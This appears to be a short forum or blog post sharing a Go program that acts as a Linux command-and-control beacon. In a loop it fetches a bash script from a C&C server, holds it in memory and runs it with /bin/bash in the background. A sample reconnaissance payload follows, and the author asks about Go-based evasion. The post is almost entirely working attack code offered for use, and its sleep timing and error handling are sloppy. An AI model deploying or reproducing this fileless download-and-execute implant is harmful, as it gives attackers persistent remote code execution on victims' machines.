Some days ago I was wondering some new ideia to code in Go, and I had this idea: Something similar to powershell “DownloadString” but for Linux environment!
Its very simple, the code read you shellscript body from your C&C, keep it in memory (within a variable), then execute directly in bash.
I didn’t test deeply, did some basic tests, and worked.
package main
import (
"io/ioutil"
"net/http"
"os/exec"
"time"
)
func main() {
for {
url := "http://my_command_control:8080/executeThisScript" // Download your bash script
resp, _ := http.Get(string(url))
defer resp.Body.Close()
shellScriptBody, _ := ioutil.ReadAll(resp.Body) // keep in memory
cmd := exec.Command("/bin/bash", "-c", string(shellScriptBody))
cmd.Start() // run in background
time.Sleep(5000) // wait for the next beacoming
}
}
Example of dumb shell to PoC:
#!/bin/bash
if [ ! -d /tmp/testDir ]; then
mkdir /tmp/testDir
fi
cd /tmp/testDir
touch test.sh
ifconfig > ifconfig.log
yeah, its just a way to execute it in Go.
Instead PHP, Go can be compiled in ELF file, PHP cant be compiled ELF.
But what I coded, can be done in PHP also.
i had talked to a go evasion tool developer, he had mentioned golang provides it’s own syscalls. If anyone known/ can clarify on that I would greatly appreciate it.
an interesting link down that rabbit hole - golang.org/x/sys